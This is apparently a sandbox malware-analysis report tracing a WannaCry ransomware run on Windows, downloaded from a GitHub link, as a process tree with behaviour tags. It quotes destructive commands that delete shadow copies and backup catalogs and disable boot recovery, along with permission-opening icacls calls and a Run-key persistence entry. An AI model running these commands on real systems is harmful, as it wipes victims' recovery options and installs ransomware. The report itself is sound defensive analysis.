PID 3860 wrote to memory of 5076	3860	msedge.exe	msedge.exe
PID 3860 wrote to memory of 5076	3860	msedge.exe	msedge.exe

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

Views/modifies file attributes 1 TTPs 13 IoCs

evasion

Hidden Files and Directories

T1564.001

Processes:

attrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exe

pid	process
5028	attrib.exe
5668	attrib.exe
3920	attrib.exe
4708	attrib.exe
600	attrib.exe
5480	attrib.exe
5668	attrib.exe
5200	attrib.exe
2032	attrib.exe
6052	attrib.exe
5508	attrib.exe
5336	attrib.exe
3568	attrib.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://github.com/limiteci/WannaCry/blob/main/WannaCry.EXE?raw=true
1⤵
- Enumerates system info in registry
- Modifies registry class
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3860

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fff07a746f8,0x7fff07a74708,0x7fff07a74718
2⤵
PID:4996

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1848,12975233043129775544,511288807946679882,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2004 /prefetch:2
2⤵
PID:2776

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1848,12975233043129775544,511288807946679882,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2104 /prefetch:3
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:2008

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1848,12975233043129775544,511288807946679882,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2776 /prefetch:8
2⤵
PID:5076

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1848,12975233043129775544,511288807946679882,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3368 /prefetch:1
2⤵
PID:1444

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1848,12975233043129775544,511288807946679882,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3392 /prefetch:1
2⤵
PID:1252

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1848,12975233043129775544,511288807946679882,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5428 /prefetch:8
2⤵
PID:3552

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1848,12975233043129775544,511288807946679882,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5428 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:1240

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1848,12975233043129775544,511288807946679882,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5528 /prefetch:1
2⤵
PID:2696

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1848,12975233043129775544,511288807946679882,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5544 /prefetch:1
2⤵
PID:3532

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=1848,12975233043129775544,511288807946679882,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5484 /prefetch:8
2⤵
PID:4360

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1848,12975233043129775544,511288807946679882,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5060 /prefetch:1
2⤵
PID:2196

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1848,12975233043129775544,511288807946679882,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6016 /prefetch:1
2⤵
PID:4488

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1848,12975233043129775544,511288807946679882,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6076 /prefetch:1
2⤵
PID:3136

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1848,12975233043129775544,511288807946679882,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6336 /prefetch:8
2⤵
PID:5176

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1848,12975233043129775544,511288807946679882,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4116 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:1576

C:\Users\Admin\Downloads\WannaCry.EXE
"C:\Users\Admin\Downloads\WannaCry.EXE"
2⤵
- Drops startup file
- Executes dropped EXE
- Sets desktop wallpaper using registry
PID:5892

C:\Windows\SysWOW64\attrib.exe
attrib +h .
3⤵
- Views/modifies file attributes
PID:6052

C:\Windows\SysWOW64\icacls.exe
icacls . /grant Everyone:F /T /C /Q
3⤵
- Modifies file permissions
PID:6064

C:\Users\Admin\Downloads\taskdl.exe
taskdl.exe
3⤵
- Executes dropped EXE
PID:64

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 274611713712231.bat
3⤵
PID:5548

C:\Windows\SysWOW64\cscript.exe
cscript.exe //nologo m.vbs
4⤵
PID:5672

C:\Windows\SysWOW64\attrib.exe
attrib +h +s F:\$RECYCLE
3⤵
- Views/modifies file attributes
PID:5508

C:\Users\Admin\Downloads\@WanaDecryptor@.exe
@WanaDecryptor@.exe co
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4644

C:\Users\Admin\Downloads\TaskData\Tor\taskhsvc.exe
TaskData\Tor\taskhsvc.exe
4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:3272

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c start /b @WanaDecryptor@.exe vs
3⤵
PID:5508

C:\Users\Admin\Downloads\@WanaDecryptor@.exe
@WanaDecryptor@.exe vs
4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3340

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
5⤵
PID:2892

C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic shadowcopy delete
6⤵
- Suspicious use of AdjustPrivilegeToken
PID:6108

C:\Users\Admin\Downloads\taskdl.exe
taskdl.exe
3⤵
- Executes dropped EXE
PID:5684

C:\Users\Admin\Downloads\taskse.exe
taskse.exe C:\Users\Admin\Downloads\@WanaDecryptor@.exe
3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5480

C:\Users\Admin\Downloads\@WanaDecryptor@.exe
@WanaDecryptor@.exe
3⤵
- Executes dropped EXE
- Sets desktop wallpaper using registry
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:2792

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "rgrqlfvlnbfubm184" /t REG_SZ /d "\"C:\Users\Admin\Downloads\tasksche.exe\"" /f
3⤵
PID:2528

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "rgrqlfvlnbfubm184" /t REG_SZ /d "\"C:\Users\Admin\Downloads\tasksche.exe\"" /f
4⤵
- Adds Run key to start application
- Modifies registry key
PID:3360

C:\Users\Admin\Downloads\taskdl.exe
taskdl.exe
3⤵
- Executes dropped EXE
PID:4732

C:\Users\Admin\Downloads\taskse.exe
taskse.exe C:\Users\Admin\Downloads\@WanaDecryptor@.exe
3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3760

C:\Users\Admin\Downloads\@WanaDecryptor@.exe
@WanaDecryptor@.exe
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4876

C:\Users\Admin\Downloads\taskdl.exe
taskdl.exe
3⤵
- Executes dropped EXE
PID:5344

C:\Users\Admin\Downloads\taskse.exe
taskse.exe C:\Users\Admin\Downloads\@WanaDecryptor@.exe
3⤵
- Executes dropped EXE
PID:3980

C:\Users\Admin\Downloads\@WanaDecryptor@.exe
@WanaDecryptor@.exe
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5452

C:\Users\Admin\Downloads\taskse.exe
taskse.exe C:\Users\Admin\Downloads\@WanaDecryptor@.exe
3⤵
- Executes dropped EXE
PID:2764

C:\Users\Admin\Downloads\@WanaDecryptor@.exe
@WanaDecryptor@.exe
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5984

C:\Users\Admin\Downloads\taskdl.exe
taskdl.exe
3⤵
- Executes dropped EXE
PID:5428

C:\Users\Admin\Downloads\taskse.exe
taskse.exe C:\Users\Admin\Downloads\@WanaDecryptor@.exe
3⤵
- Executes dropped EXE
PID:2680

C:\Users\Admin\Downloads\@WanaDecryptor@.exe
@WanaDecryptor@.exe
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:404

C:\Users\Admin\Downloads\taskdl.exe
taskdl.exe
3⤵
- Executes dropped EXE
PID:4208

C:\Users\Admin\Downloads\taskse.exe
taskse.exe C:\Users\Admin\Downloads\@WanaDecryptor@.exe
3⤵
- Executes dropped EXE
PID:3980

C:\Users\Admin\Downloads\@WanaDecryptor@.exe
@WanaDecryptor@.exe
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5868

C:\Users\Admin\Downloads\taskdl.exe
taskdl.exe
3⤵
- Executes dropped EXE
PID:2056

C:\Users\Admin\Downloads\taskse.exe
taskse.exe C:\Users\Admin\Downloads\@WanaDecryptor@.exe
3⤵
- Executes dropped EXE
PID:3556

C:\Users\Admin\Downloads\@WanaDecryptor@.exe
@WanaDecryptor@.exe
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2808

C:\Users\Admin\Downloads\taskdl.exe
taskdl.exe
3⤵
- Executes dropped EXE
PID:4540

C:\Users\Admin\Downloads\taskse.exe
taskse.exe C:\Users\Admin\Downloads\@WanaDecryptor@.exe
3⤵
- Executes dropped EXE
PID:5512

C:\Users\Admin\Downloads\@WanaDecryptor@.exe
@WanaDecryptor@.exe
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:6120

C:\Users\Admin\Downloads\taskdl.exe
taskdl.exe
3⤵
- Executes dropped EXE
PID:848

C:\Users\Admin\Downloads\taskse.exe
taskse.exe C:\Users\Admin\Downloads\@WanaDecryptor@.exe
3⤵
- Executes dropped EXE
PID:5680

C:\Users\Admin\Downloads\@WanaDecryptor@.exe
@WanaDecryptor@.exe
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4112

C:\Users\Admin\Downloads\taskdl.exe
taskdl.exe
3⤵
- Executes dropped EXE
PID:4540

C:\Users\Admin\Downloads\taskse.exe
taskse.exe C:\Users\Admin\Downloads\@WanaDecryptor@.exe
3⤵
- Executes dropped EXE
PID:3740

C:\Users\Admin\Downloads\@WanaDecryptor@.exe
@WanaDecryptor@.exe
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5716

C:\Users\Admin\Downloads\taskdl.exe
taskdl.exe
3⤵
- Executes dropped EXE
PID:4540

C:\Users\Admin\Downloads\taskse.exe
taskse.exe C:\Users\Admin\Downloads\@WanaDecryptor@.exe
3⤵
- Executes dropped EXE
PID:5160

C:\Users\Admin\Downloads\@WanaDecryptor@.exe
@WanaDecryptor@.exe
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:876

C:\Users\Admin\Downloads\taskdl.exe
taskdl.exe
3⤵
- Executes dropped EXE
PID:4680

C:\Users\Admin\Downloads\taskse.exe
taskse.exe C:\Users\Admin\Downloads\@WanaDecryptor@.exe
3⤵
- Executes dropped EXE
PID:5068

C:\Users\Admin\Downloads\@WanaDecryptor@.exe
@WanaDecryptor@.exe
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5652

C:\Users\Admin\Downloads\taskdl.exe
taskdl.exe
3⤵
- Executes dropped EXE
PID:548

C:\Users\Admin\Downloads\taskse.exe
taskse.exe C:\Users\Admin\Downloads\@WanaDecryptor@.exe
3⤵
- Executes dropped EXE
PID:2164

C:\Users\Admin\Downloads\@WanaDecryptor@.exe
@WanaDecryptor@.exe
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5776

C:\Users\Admin\Downloads\taskdl.exe
taskdl.exe
3⤵
- Executes dropped EXE
PID:396

C:\Users\Admin\Downloads\WannaCry.EXE
"C:\Users\Admin\Downloads\WannaCry.EXE"
2⤵
- Executes dropped EXE
PID:5728

C:\Windows\SysWOW64\attrib.exe
attrib +h .
3⤵
- Views/modifies file attributes
PID:5028

C:\Windows\SysWOW64\icacls.exe
icacls . /grant Everyone:F /T /C /Q
3⤵
- Modifies file permissions
PID:6068

C:\Users\Admin\Downloads\WannaCry.EXE
"C:\Users\Admin\Downloads\WannaCry.EXE"
2⤵
- Executes dropped EXE
PID:5588

C:\Windows\SysWOW64\attrib.exe
attrib +h .
3⤵
- Views/modifies file attributes
PID:3920

C:\Windows\SysWOW64\icacls.exe
icacls . /grant Everyone:F /T /C /Q
3⤵
- Modifies file permissions
PID:1916

C:\Users\Admin\Downloads\WannaCry.EXE
"C:\Users\Admin\Downloads\WannaCry.EXE"
2⤵
- Executes dropped EXE
PID:3428

C:\Windows\SysWOW64\attrib.exe
attrib +h .
3⤵
- Views/modifies file attributes
PID:4708

C:\Windows\SysWOW64\icacls.exe
icacls . /grant Everyone:F /T /C /Q
3⤵
- Modifies file permissions
PID:5508

C:\Users\Admin\Downloads\WannaCry.EXE
"C:\Users\Admin\Downloads\WannaCry.EXE"
2⤵
- Executes dropped EXE
PID:4780

C:\Windows\SysWOW64\attrib.exe
attrib +h .
3⤵
- Views/modifies file attributes
PID:600

C:\Windows\SysWOW64\icacls.exe
icacls . /grant Everyone:F /T /C /Q
3⤵
- Modifies file permissions
PID:3980

C:\Users\Admin\Downloads\WannaCry.EXE
"C:\Users\Admin\Downloads\WannaCry.EXE"
2⤵
- Executes dropped EXE
PID:6000

C:\Windows\SysWOW64\attrib.exe
attrib +h .
3⤵
- Views/modifies file attributes
PID:5480

C:\Windows\SysWOW64\icacls.exe
icacls . /grant Everyone:F /T /C /Q
3⤵
- Modifies file permissions
PID:2680

C:\Users\Admin\Downloads\WannaCry.EXE
"C:\Users\Admin\Downloads\WannaCry.EXE"
2⤵
- Executes dropped EXE
PID:4324

C:\Windows\SysWOW64\attrib.exe
attrib +h .
3⤵
- Views/modifies file attributes
PID:5200

C:\Windows\SysWOW64\icacls.exe
icacls . /grant Everyone:F /T /C /Q
3⤵
- Modifies file permissions
PID:1448

C:\Users\Admin\Downloads\WannaCry.EXE
"C:\Users\Admin\Downloads\WannaCry.EXE"
2⤵
- Executes dropped EXE
PID:3892

C:\Windows\SysWOW64\attrib.exe
attrib +h .
3⤵
- Views/modifies file attributes
PID:5668

C:\Windows\SysWOW64\icacls.exe
icacls . /grant Everyone:F /T /C /Q
3⤵
- Modifies file permissions
PID:3920

C:\Users\Admin\Downloads\WannaCry.EXE
"C:\Users\Admin\Downloads\WannaCry.EXE"
2⤵
- Executes dropped EXE
PID:600

C:\Windows\SysWOW64\attrib.exe
attrib +h .
3⤵
- Views/modifies file attributes
PID:5336

C:\Windows\SysWOW64\icacls.exe
icacls . /grant Everyone:F /T /C /Q
3⤵
- Modifies file permissions
PID:3456

C:\Users\Admin\Downloads\WannaCry.EXE
"C:\Users\Admin\Downloads\WannaCry.EXE"
2⤵
- Executes dropped EXE
PID:5804

C:\Windows\SysWOW64\attrib.exe
attrib +h .
3⤵
- Views/modifies file attributes
PID:2032

C:\Windows\SysWOW64\icacls.exe
icacls . /grant Everyone:F /T /C /Q
3⤵
- Modifies file permissions
PID:5524

C:\Users\Admin\Downloads\WannaCry.EXE
"C:\Users\Admin\Downloads\WannaCry.EXE"
2⤵
- Executes dropped EXE
PID:4708

C:\Windows\SysWOW64\attrib.exe
attrib +h .
3⤵
- Views/modifies file attributes
PID:3568

C:\Windows\SysWOW64\icacls.exe
icacls . /grant Everyone:F /T /C /Q
3⤵
- Modifies file permissions
PID:5964

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1848,12975233043129775544,511288807946679882,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2076 /prefetch:1
2⤵
PID:2156

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1848,12975233043129775544,511288807946679882,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6492 /prefetch:1
2⤵
PID:5404

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=1848,12975233043129775544,511288807946679882,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5060 /prefetch:8
2⤵
PID:5264

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=1848,12975233043129775544,511288807946679882,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=5700 /prefetch:8
2⤵
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
PID:5228

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1848,12975233043129775544,511288807946679882,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5036 /prefetch:2
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:5452

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1848,12975233043129775544,511288807946679882,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5612 /prefetch:1
2⤵
PID:5716

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2604

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2940

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:6052

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:3892

C:\Users\Admin\Downloads\WannaCry.EXE
"C:\Users\Admin\Downloads\WannaCry.EXE"
1⤵
- Executes dropped EXE
PID:3732

C:\Windows\SysWOW64\attrib.exe
attrib +h .
2⤵
- Views/modifies file attributes
PID:5668

C:\Windows\SysWOW64\icacls.exe
icacls . /grant Everyone:F /T /C /Q
2⤵
- Modifies file permissions
PID:212

C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\ImportRepair.ini
1⤵
- Opens file in notepad (likely ransom note)
PID:5436

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SendNotifyMessage
PID:5504

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffef466ab58,0x7ffef466ab68,0x7ffef466ab78
2⤵
PID:2768

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1860 --field-trial-handle=1944,i,16565360431695904850,9230001625327280107,131072 /prefetch:2
2⤵
PID:1900

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2212 --field-trial-handle=1944,i,16565360431695904850,9230001625327280107,131072 /prefetch:8
2⤵
PID:1708

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2268 --field-trial-handle=1944,i,16565360431695904850,9230001625327280107,131072 /prefetch:8
2⤵
PID:3176

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3112 --field-trial-handle=1944,i,16565360431695904850,9230001625327280107,131072 /prefetch:1
2⤵
PID:560

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3192 --field-trial-handle=1944,i,16565360431695904850,9230001625327280107,131072 /prefetch:1
2⤵
PID:3620

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4268 --field-trial-handle=1944,i,16565360431695904850,9230001625327280107,131072 /prefetch:1
2⤵
PID:3744

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4424 --field-trial-handle=1944,i,16565360431695904850,9230001625327280107,131072 /prefetch:8
2⤵
PID:4588

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4444 --field-trial-handle=1944,i,16565360431695904850,9230001625327280107,131072 /prefetch:8
2⤵
PID:3264

C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"
1⤵
PID:5548

C:\Users\Admin\Desktop\@WanaDecryptor@.exe
"C:\Users\Admin\Desktop\@WanaDecryptor@.exe"
1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3760

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
1⤵
- Enumerates system info in registry
- Modifies registry class
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
